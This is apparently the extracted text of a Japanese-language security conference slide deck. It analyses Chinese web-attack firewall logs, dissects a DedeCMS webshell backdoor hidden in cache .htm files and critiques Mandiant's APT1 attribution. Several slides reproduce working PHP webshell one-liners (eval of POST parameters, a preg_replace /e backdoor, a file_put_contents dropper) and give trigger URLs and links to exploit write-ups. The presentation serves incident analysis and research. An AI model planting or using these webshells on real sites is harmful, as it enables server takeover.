Más contenido relacionado AVTokyo 2013.5 - China is a victim, too :-) 1. China is a victim, too :)
(AVTokyo Special Edition)
Darkfloyd x Zetta, VXRL
5. 研究と解析
●
●
●
北京の Knownsec のクラウドベースのアプリケ
ーション FW からキャプチャした攻撃のログ /
データと VXRL で解析をした結果を共有してい
る。
我々は 11 月 11 日を解析した。この日は中国本
土でオンラインショッピング / 電子商取引の割
引が行われる日 (Single's Day, 光棍節 ) 。
我々は攻撃の重要度やインパクトを考慮して被
害者の IP やドメイン名は公開しない。
12. 攻撃タイプの分布
Attack Type
SCANNER
No. of Request
Percentage
59101248
91.3447%
LRFI
218753
0.3381%
FILEI
222774
0.3443%
SPECIAL
35838
0.0554%
WEBSHELL
42463
0.0656%
4491625
6.9421%
SQLI
274792
0.4247%
XSS
225796
0.3490%
1022
0.0016%
86140
0.1331%
887
0.0014%
64701338
100.00%
COLLECTOR
OS_COMMAND
CODE
OTHERS
17. “ いい人ランキング”への投票
Tou.php – “Tou” は “投票” , 中国語で “投”
このサイトへのリクエストデータは 6.5GB にもなる。
事実、我々中国人は「良い行いと、善良な人」に対してポジテ
ィブにサポートをする
ただ、実際の投票とロボットによる投票の区別は難しい
35. 参考 : DedeCMS Exploit
Interesting technique to hid the webshell: put it like a cache file.
http://www.nxadmin.com/penetration/1168.html
http://blog.csdn.net/seoyundu/article/details/12855759
/plus/download.php exploit - Inject Webshell
http://www.xiaosedi.com/post/dedecms_exp_01.html
/plus/search.php exploit - Inject Webshell
http://eoo.hk/oswork/28.htm
DedeCMS backdoor killer from Anquan.org
http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895
36. ログに 90sec.php を見つけて、 .inc ファイルに以下のステートメントがあっ
た:
{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);
{/dede:php}
でも、そんなフォルダーは見つからない
なぜ?
data/cache フォルダー配下に、以下のコードを含む複数の htm (myad1.htm,myad-16.htm,mytag-1208.htm) ファイルが見つかった :
<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?
>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>
<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/
[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
–>
37. おかしい、 .htm ページが webshell として機能している。
そして .htm ファイルが他の php ファイルを include している。
チェックをしたら /mytag_js.php が追加されていた
38. スキャナーに検出されることなく、様々な ID を渡
しながら、以下の URL で webshell バックドアをト
リガーする :
http://www.nxadmin.com/plus/mytag_js.php?id=1208
http://www.nxadmin.com/plus/ad_js.php?id=1
参考 :http://www.nxadmin.com/penetration/1168.html
48. 中国のホワイトハット : Anquan.org
( 様々なソフトウェアやセキュリティ製
品ベンダーの間でのセキュア同盟 )
●
800 のベンダー
●
ベンダーに対して中立
●
どんな違反行為、プライバシー侵害、フィッシ
ングアタック等に対しても報告できる公共のプ
ラットフォーム
●
http://www.anquan.org/help/aboutus/authen/
50. APT1 レポート : 反論
●
●
●
Mandiant の APT1 レポートを読んだ人いる?
VXRL の研究者、 Ran2 がレポートを分析し
た。
Mandiant は、中国人民解放軍 61389 部隊から
米国への攻撃があったと推測 :
−
攻撃者のパスワード
−
フォーラムの投稿
から攻撃者をプロファイリング
51. Mandiant の APT1 レポート
●
●
●
2013 年 2 月 18 日に、 Mandiant は前例のない
報告書を発表した。
"APT1: 中国のサイバースパイユニットの一つ
に関する暴露 "
Mandiant は、人民解放軍( PLA )の 61398 部
隊と、 APT 攻撃グループ APT1 (別名コメン
トクルー)とを結ぶ証拠を発見したと主張
52. Mandiant の APT1 レポート
●
●
●
中国当局は、 Mandiant が非難している APT の
活動へのつながりを全面的に否定している。
数名の論評家曰く: "Mandiant は明らかに
Beijing (北京)の犯行現場を抑えている "
しかし、懐疑論者曰く: "Mandiant によって証
拠が中国または PLA に向けられるようにでっ
ち上げられている。結論に説得力のあるハッキ
ングの証拠が含まれていなかった "
53. 事実の解明 #1:
攻撃者のプロファイリング
●
「 APT1 はデジタルマシンの中の幽霊ではな
い」と Mandinat は主張する。 Mandinat は
APT1 のペルソナの数を特定した。 APT1 レポ
ートの 51 ページでは、 APT1 のペルソナを特
定したデータマイニングによるプロファイリン
グの方法についてのヒントが示されている。
−
APT1 のデジタル兵器の作者 ( つまり、マルウェアの作者 )
−
APT1 の FQDN の登録者 ( 別名 FQDN プロファイリング )
−
電子メールアカウント ( ソーシャルウェブサイトで使われた )
−
漏洩した Rootkit.com アカウントの登録記録
57. 事実の解明 #1:
攻撃者のプロファイリング
●
UglyGorilla が APT1 マルウェアの作成者である
Jack Wang または Wang Dong であることを証
明する高い可能性を持っているにもかかわら
ず、私は彼が中国兵または PLA の 61398 部隊
にサービスを提供している証拠を見つけていま
せん。私は見つけることができる唯一のつなが
りは中国の軍事フォーラムでの彼の投稿です
が、自分がただの軍事愛好家と述べただけだっ
た。
61. 事実の解明 # 2 :インフラ、
リモートデスクトップセッション
●
Mandiant は 4 ページで、 1905 のうち 1849 セ
ッションで「中国語(簡体字) - 米国のキーボ
ード」キーボードレイアウトを使用したと付言
している。また、彼らは攻撃者が Microsoft の
OS の中国語版を使用したと考えている。攻撃
者が Microsoft の OS の中国語版を使用してい
るという理由で、 Mandiant は APT1 は中国本
土にいる人間であると考えている。
62. 事実の解明 # 2 :インフラ、
リモートデスクトップセッション
●
RDP クライアントは RDP サーバ(ここでは、
被害者または踏み台)に 4 バイトのキーボード
のレイアウトを送信することが、マイクロソフ
トの RDP プロトコル文書から分かった。 RDP
サーバにネットワークスニファをインストール
することで、デジタルな証拠を得ることができ
ます。攻撃者が「中国語(簡体字) - US キー
ボード」を使用した場合、受信者側では、ネッ
トワークパケットから 0x0804 という 4 バイト
の証拠の検出ができます。
67. 感謝 Thank you so much :)
Zetta と Ran2 の
仕事、分析、時間に尊敬と感謝
Knownsec の研究目的の攻撃ログの共有に
深い感謝
darkfloyd@vxrl.org
ozetta@vxrl.org
ran2@vxrl.org